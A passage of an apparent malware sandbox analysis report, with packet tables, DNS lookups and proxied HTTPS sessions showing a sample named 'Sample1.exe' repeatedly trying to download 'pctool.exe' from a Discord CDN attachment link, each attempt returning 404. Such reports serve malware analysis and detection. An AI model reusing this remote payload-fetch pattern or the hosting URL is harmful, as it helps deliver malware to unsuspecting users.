                        Jan 15, 2025 15:21:00.252049923 CET49755443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:00.252063036 CET44349755162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:00.755834103 CET44349755162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:00.757452011 CET49755443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:00.757482052 CET44349755162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:00.915502071 CET44349755162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:00.915570974 CET44349755162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:00.915620089 CET49755443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:00.916240931 CET49755443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:05.923739910 CET49757443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:05.923851013 CET44349757162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:05.923976898 CET49757443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:05.924329042 CET49757443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:05.924375057 CET44349757162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:06.377069950 CET44349757162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:06.390872002 CET49757443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:06.390961885 CET44349757162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:06.530364037 CET44349757162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:06.530425072 CET44349757162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:06.530482054 CET49757443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:06.542407990 CET49757443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:11.548736095 CET49760443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:11.548794031 CET44349760162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:11.548887968 CET49760443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:11.549151897 CET49760443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:11.549170017 CET44349760162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:12.023483992 CET44349760162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:12.025027037 CET49760443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:12.025051117 CET44349760162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:12.188699961 CET44349760162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:12.188751936 CET44349760162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:12.188910961 CET49760443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:12.189508915 CET49760443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:17.205454111 CET49761443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:17.205508947 CET44349761162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:17.205627918 CET49761443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:17.205912113 CET49761443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:17.205921888 CET44349761162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:17.686233044 CET44349761162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:17.687823057 CET49761443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:17.687863111 CET44349761162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:17.839530945 CET44349761162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:17.839608908 CET44349761162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:17.839904070 CET49761443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:17.840852976 CET49761443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:22.845237970 CET49762443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:22.845294952 CET44349762162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:22.845397949 CET49762443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:22.845791101 CET49762443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:22.845808029 CET44349762162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:23.314791918 CET44349762162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:23.316097975 CET49762443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:23.316133022 CET44349762162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:23.438607931 CET44349762162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:23.438694954 CET44349762162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:23.438771009 CET49762443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:23.441231966 CET49762443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:28.454643965 CET49765443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:28.454689026 CET44349765162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:28.454790115 CET49765443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:28.455451965 CET49765443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:28.455466986 CET44349765162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:28.939367056 CET44349765162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:28.954863071 CET49765443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:28.954912901 CET44349765162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:29.086072922 CET44349765162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:29.086150885 CET44349765162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:29.086208105 CET49765443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:29.087042093 CET49765443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:34.095412970 CET49766443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:34.095462084 CET44349766162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:34.095603943 CET49766443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:34.096002102 CET49766443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:34.096014977 CET44349766162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:34.558499098 CET44349766162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:34.559926033 CET49766443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:34.559962034 CET44349766162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:34.705068111 CET44349766162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:34.705152988 CET44349766162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:34.705199957 CET49766443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:34.705682039 CET49766443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:39.720493078 CET49767443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:39.720561028 CET44349767162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:39.720662117 CET49767443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:39.721086025 CET49767443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:39.721105099 CET44349767162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:40.207102060 CET44349767162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:40.208895922 CET49767443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:40.208936930 CET44349767162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:40.342513084 CET44349767162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:40.342679024 CET44349767162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:40.342757940 CET49767443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:40.343221903 CET49767443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:45.352475882 CET49768443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:45.352540970 CET44349768162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:45.352650881 CET49768443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:45.353039026 CET49768443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:45.353049994 CET44349768162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:45.857256889 CET44349768162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:45.859039068 CET49768443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:45.859066963 CET44349768162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:46.012118101 CET44349768162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:46.012188911 CET44349768162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:46.012238026 CET49768443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:46.012903929 CET49768443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:51.021147966 CET49773443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:51.021248102 CET44349773162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:51.021354914 CET49773443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:51.022145987 CET49773443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:51.022181988 CET44349773162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:51.493000031 CET44349773162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:51.499052048 CET49773443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:51.499106884 CET44349773162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:51.634990931 CET44349773162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:51.635164976 CET44349773162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:51.639342070 CET44349773162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:51.639483929 CET49773443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:52.094378948 CET49773443192.168.2.25162.159.134.233

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jan 15, 2025 15:18:48.602514029 CET5695953192.168.2.251.1.1.1
                        Jan 15, 2025 15:18:48.609025002 CET53569591.1.1.1192.168.2.25
                        Jan 15, 2025 15:21:47.699126959 CET6386553192.168.2.251.1.1.1
                        Jan 15, 2025 15:21:57.471528053 CET6386553192.168.2.251.1.1.1

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Jan 15, 2025 15:18:48.602514029 CET192.168.2.251.1.1.10x83eeStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                        Jan 15, 2025 15:21:47.699126959 CET192.168.2.251.1.1.10xcb27Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                        Jan 15, 2025 15:21:57.471528053 CET192.168.2.251.1.1.10xe92dStandard query (0)browser.events.data.msn.cnA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Jan 15, 2025 15:18:42.067709923 CET1.1.1.1192.168.2.250xc9d2No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                        Jan 15, 2025 15:18:42.067709923 CET1.1.1.1192.168.2.250xc9d2No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                        Jan 15, 2025 15:18:48.609025002 CET1.1.1.1192.168.2.250x83eeNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                        Jan 15, 2025 15:18:48.609025002 CET1.1.1.1192.168.2.250x83eeNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                        Jan 15, 2025 15:18:48.609025002 CET1.1.1.1192.168.2.250x83eeNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                        Jan 15, 2025 15:18:48.609025002 CET1.1.1.1192.168.2.250x83eeNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                        Jan 15, 2025 15:18:48.609025002 CET1.1.1.1192.168.2.250x83eeNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                        Jan 15, 2025 15:21:47.705893040 CET1.1.1.1192.168.2.250xcb27No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                        Jan 15, 2025 15:21:57.478562117 CET1.1.1.1192.168.2.250xe92dNo error (0)browser.events.data.msn.cnglobal.asimov.events.data.trafficmanager.netCNAME (Canonical name)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • cdn.discordapp.com

                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.2549724162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:18:50 UTC128OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        Connection: Keep-Alive
                        2025-01-15 14:18:50 UTC1047INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:18:50 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=X7ypTZTEe3FS6ntDcrLVkieFIGLyMnWqCWZbbyNseHE-1736950730-1.0.1.1-likCCWH0Q3yYZ6FO1WQd1bbYEd4g5Y1gK7QgTl5BNgWEF1Hf9EZgevojPYP8qoum1CfC6LCAACww6gAuPaOygg; path=/; expires=Wed, 15-Jan-25 14:48:50 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Es%2FdW%2FY14VFucDKBS72G8XCQ6MjEsgU%2B9gRwWVjvoVstzjj4zCAKiPTuok0W7XcanjENsHojotNuwDiYQyONyM6TAub21ZCkl92Bm4SmOwgjtCN9H31rKuE2hPrMpRd0Yvvm0Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=GLR.n09ePR8wKJpZKQOcpwthnOqAoRzDPG27pjOMP5M-1736950730258-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 90267f4fdd3d41e7-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:18:50 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.2549725162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:18:56 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:18:56 UTC1049INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:18:56 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=sPZ._gvZuiMsNC1n96Ew5M8C1UyphFYGF.7LtT3BzbQ-1736950736-1.0.1.1-9s7iaqaXP0mJn8UO0Tc5xnADY7mfwfn8HAIp31aF2QOpBezGeXHRvvU7wWZQjF652R075AM5d9iZjnolT1ftng; path=/; expires=Wed, 15-Jan-25 14:48:56 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z1kp3rZeL76F6b4n9wjFiAeE1XDTJXRDqI78XT20UV%2BOodmhJF%2Bg4cb%2FHqdLN5XIWgIflP44RMLOGIJBgNFkvlMQ5WQtj%2B8K0Y05bLtNhvYjUbGX2nCRLbS19XPf93VxHEiOdw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=SQe4d2dytBuhz3b7tvK8tGYIrzXfAv6vBzbIWTzU2HQ-1736950736123-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 90267f74ad5a41d3-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:18:56 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.2549726162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:19:01 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:19:01 UTC1045INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:19:01 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=vjKnbeyi0TI4kfIxj6mjPCAbJrqRMkAIJ_xSJEapyos-1736950741-1.0.1.1-bstkEOAXd52awHCodGlKdwmjNpF23s3tAvxhzveMTZaAkUvUCMtuY7czgcABYDiHqXqD1iJuOss56FVuvx771A; path=/; expires=Wed, 15-Jan-25 14:49:01 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lnca4oAFgsjacK0sn5i5m91LAv9Z8lOWc%2BWSiQEqg6BauUcsSSJm1JcCGiSrmx4AwGRYET7RRNc0JR0OjEgTK6EJYoZQr73rofRCcBrs713za0TcdE%2FtVMiJMrMc12kp4mHoTw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=5tm_VWzg3O0_T7.Qm_PSiBVUTsYz44y81LD73x1DT24-1736950741785-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 90267f981e56f799-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:19:01 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.2.2549728162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:19:07 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:19:07 UTC1047INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:19:07 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=tZGLutk0LFGV2qTE_YtsK1Ahp3kQ8T1ERueJsI.J1LQ-1736950747-1.0.1.1-Ke1mlI3InrdrQndQh6YXpmE9.x9gwgI.6XtAyJg760Iw81oTRbSo_lWJ6dQkeo3AcNeqz1ycVyQXc8bV_ka4Mw; path=/; expires=Wed, 15-Jan-25 14:49:07 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GPSob8UWbMprOoalMDEZ2Ahtm3r8FGl9aDBLs%2BYQX0c6ixZJXc%2BY3GhGSsCtQgh99Ze6MwGmDoOQUrK4SwzJwEh2Q0mCDTh%2FueGe6lF9pXU2g7zBgpodyTVaJjk8yNn4T5Ekcw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=Z9lzIZQM040oveucDtfeTrlMJfknbSPBUtCO5OdGjgI-1736950747441-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 90267fbb5977c33c-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:19:07 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        4192.168.2.2549729162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:19:12 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:19:13 UTC1047INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:19:13 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=2m1rSsOEp2Ha_S74ELCRn3VC8gVJnZ0Fdgmfkf7FBc4-1736950753-1.0.1.1-xG9gBGNxNGZmgAohlUov77NM3.QnhZDttAtyFJCFgqdYcp9Zd5d_vhWK3pf9ACJm1U8t4tjNN6iFjkr7RVXbWQ; path=/; expires=Wed, 15-Jan-25 14:49:13 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=89dYNmdGL7ZmiCilgBnIugJb8SKyhsV7KNpMyWw2vWK9P%2BDo1%2BScBmFkrZntjl6Kd8DiM%2BKIvce3Su05gdnd8TdvrkjQPNlxRSJQ9QPC8S1DIjdrIYAvq8zhg11K6t1fifDGfA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=3Bchd1uF6715knDbZx82swkgk.h2L.O6b8.4V.w9gXI-1736950753065-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 90267fde88810f67-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:19:13 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        5192.168.2.2549733162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:19:18 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:19:18 UTC1053INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:19:18 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=TM0WgwnCdWV5EI2EFCI7RetZqJKvnynsHlRAP46Yxd8-1736950758-1.0.1.1-YiqDepsOJEqYWpLHJew0UlftcWASkDedMFJQj_rdTUEhagmeERV3de2yqXbD_jDANOlbKIkjI.FBdriUzZG1Zg; path=/; expires=Wed, 15-Jan-25 14:49:18 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YcUQ%2FwjE%2BYeyg%2FCw%2BuU5sC%2BwUzA8edXlfboY3bEHhgoEPeOtGZeAb6Zta3CaZ6mab74IO4Gm2FPlY4QYWvqgoq0QAuzVuztBx3HZ9fCWMFmhmiLrWmE6lF%2BSTP0GBwcDTWN28g%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=NBBwomD_aWliSeYZYpYtDDbx9eg5La688JlEqij29Xk-1736950758797-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902680025f6a0c9c-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:19:18 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        6192.168.2.2549734162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:19:24 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:19:24 UTC1043INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:19:24 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=F7QkNRnc3xmRxVvV9zzcLxtoUTS2rdNMwvk_3Ps6FnU-1736950764-1.0.1.1-C6ZXZxPnOSGKo2g9mwNIGR_7dVlZFK5h7z8FXC2XrPShcBxjW8LXcEWiC58RyO6hwgN.w1HAIrPfFhNBpo9X8A; path=/; expires=Wed, 15-Jan-25 14:49:24 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PPBwSglxSzScbQdpFAjnOB9R9h9mBAAIuJBHJ2AjKkgyuPj6itW6s7%2BEdANTwDFeAwNhUaIHyEGi3rrLAdvDmVp8pgCBKmmwlqqoY5iRhzPUEZF9ftDyvLsGDorEl8E7sEh38A%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=POu39wA5Ghdvj4D9Hl0YGjblB8aXaB8A2uv..LFn6aI-1736950764421-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902680257e4a424b-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:19:24 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        7192.168.2.2549735162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:19:29 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:19:30 UTC1047INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:19:30 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=B7UkK4GtkILtya7G_fIfzqT9117kKEWh52Lq.xa6qgI-1736950770-1.0.1.1-a31nc6GY8NPoX3fGMV7DfN1vwszl1ShYRoP7pPdfnnFQijT71Qug1GP3QrVu1aiw8Y3vcYB1W4dMXQC5cyq_dA; path=/; expires=Wed, 15-Jan-25 14:49:30 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BaV7niJrZKvuk8F%2FxpMnvY8LETkJkQjfVXm8jtnsCiLDzr7Jk9ipr32pbouqxwmCeW0KoP0Wrp9qwxcM4Cc2%2Baay3ZjmUA3l6FcivZaEnZIIAfVvQ4XF5gqwQL1FhgoTSzOkww%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=U4CKkQsE4PsII0LkNqEhMgsh2RDIjkbCVdZoNaS0z4k-1736950770152-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902680496f511a44-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:19:30 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        8192.168.2.2549736162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:19:35 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:19:35 UTC1043INHTTP/1.1 404 Not Found
